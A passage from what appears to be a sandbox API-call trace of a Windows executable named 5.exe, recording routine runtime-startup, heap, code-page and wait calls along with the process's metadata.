(hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.554] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.567] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.588] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.687] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.788] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.805] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.862] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.919] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0138.054] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0138.579] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0138.646] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0138.731] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0138.773] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0138.860] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0139.185] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0139.221] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0139.290] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) Process: id = "10" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe" page_root = "0x3c2e4000" os_pid = "0x93c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x958" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 96 os_tid = 0x95c [0131.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xc3b68e90, dwHighDateTime=0x1d62438)) [0131.477] GetCurrentProcessId () returned 0x93c [0131.477] GetCurrentThreadId () returned 0x95c [0131.477] GetTickCount () returned 0x11550a0 [0131.477] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=25186395986) returned 1 [0131.477] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x402644)) [0131.477] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.477] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3020000 [0131.478] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.478] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0131.478] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0131.478] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0131.478] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0131.480] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x214) returned 0x30207d0 [0131.480] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.480] GetCurrentThreadId () returned 0x95c [0131.480] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x402075, hStdOutput=0x4023ae, hStdError=0x30207d0)) [0131.480] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x800) returned 0x30209f0 [0131.481] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0131.481] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0131.481] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.481] SetHandleCount (uNumber=0x20) returned 0x20 [0131.481] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe\" " [0131.481] GetEnvironmentStringsW () returned 0x30ef28* [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x0, Size=0xaca) returned 0x30211f8 [0131.481] FreeEnvironmentStringsW (penv=0x30ef28) returned 1 [0131.481] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x470f30, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe")) returned 0x56 [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x0, Size=0xb6) returned 0x3021cd0 [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x98) returned 0x3021d90 [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x3e) returned 0x3021e30 [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x6c) returned 0x3021e78 [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x6e) returned 0x3021ef0 [0131.481] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x78) returned 0x3021f68 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x62) returned 0x3021fe8 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x2e) returned 0x3022058 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x48) returned 0x3022090 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x28) returned 0x30220e0 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x1a) returned 0x3022110 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x4a) returned 0x3022138 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x72) returned 0x3022190 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x30) returned 0x3022210 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x2e) returned 0x3022248 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x1c) returned 0x3022280 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0xd2) returned 0x30222a8 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x7c) returned 0x3022388 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x36) returned 0x3022410 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x3a) returned 0x3022450 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x90) returned 0x3022498 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x24) returned 0x3022530 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x30) returned 0x3022560 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x36) returned 0x3022598 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x48) returned 0x30225d8 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x52) returned 0x3022628 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x3c) returned 0x3022688 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x82) returned 0x30226d0 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x2e) returned 0x3022760 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x1e) returned 0x3022798 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x2c) returned 0x30227c0 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x54) returned 0x30227f8 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x52) returned 0x3022858 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x2a) returned 0x30228b8 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x3c) returned 0x30228f0 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x54) returned 0x3022938 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x24) returned 0x3022998 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x30) returned 0x30229c8 [0131.482] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x8c) returned 0x3022a00 [0131.482] HeapFree (in: hHeap=0x3020000, dwFlags=0x0, lpMem=0x30211f8 | out: hHeap=0x3020000) returned 1 [0131.483] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x8, Size=0x80) returned 0x3022a98 [0131.483] GetLastError () returned 0x0 [0131.483] SetLastError (dwErrCode=0x0) [0131.483] GetLastError () returned 0x0 [0131.483] SetLastError (dwErrCode=0x0) [0131.483] GetLastError () returned 0x0 [0131.483] SetLastError (dwErrCode=0x0) [0131.483] GetACP () returned 0x4e4 [0131.483] RtlAllocateHeap (HeapHandle=0x3020000, Flags=0x0, Size=0x220) returned 0x3022b20 [0131.483] GetLastError () returned 0x0 [0131.483] SetLastError (dwErrCode=0x0) [0131.483] IsValidCodePage (CodePage=0x4e4) returned 1 [0131.483] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0131.484] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0131.484] GetLastError () returned 0x0 [0131.484] SetLastError (dwErrCode=0x0) [0131.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0131.484] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0131.484] GetLastError () returned 0x0 [0131.484] SetLastError (dwErrCode=0x0) [0131.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᾓὓ䵋@Ā") returned 256 [0131.484] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᾓὓ䵋@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0131.484] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᾓὓ䵋@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0131.484] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿWãT\x1e\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0131.484] GetLastError () returned 0x0 [0131.484] SetLastError (dwErrCode=0x0) [0131.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᾓὓ䵋@Ā") returned 256 [0131.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᾓὓ䵋@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0131.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᾓὓ䵋@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0131.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿWãT\x1e\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0131.485] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0131.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4012b5) returned 0x0 [0131.485] RtlSizeHeap (HeapHandle=0x3020000, Flags=0x0, MemoryPointer=0x3022a98) returned 0x80 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.494] GetTapeParameters (in: hDevice=0x0, 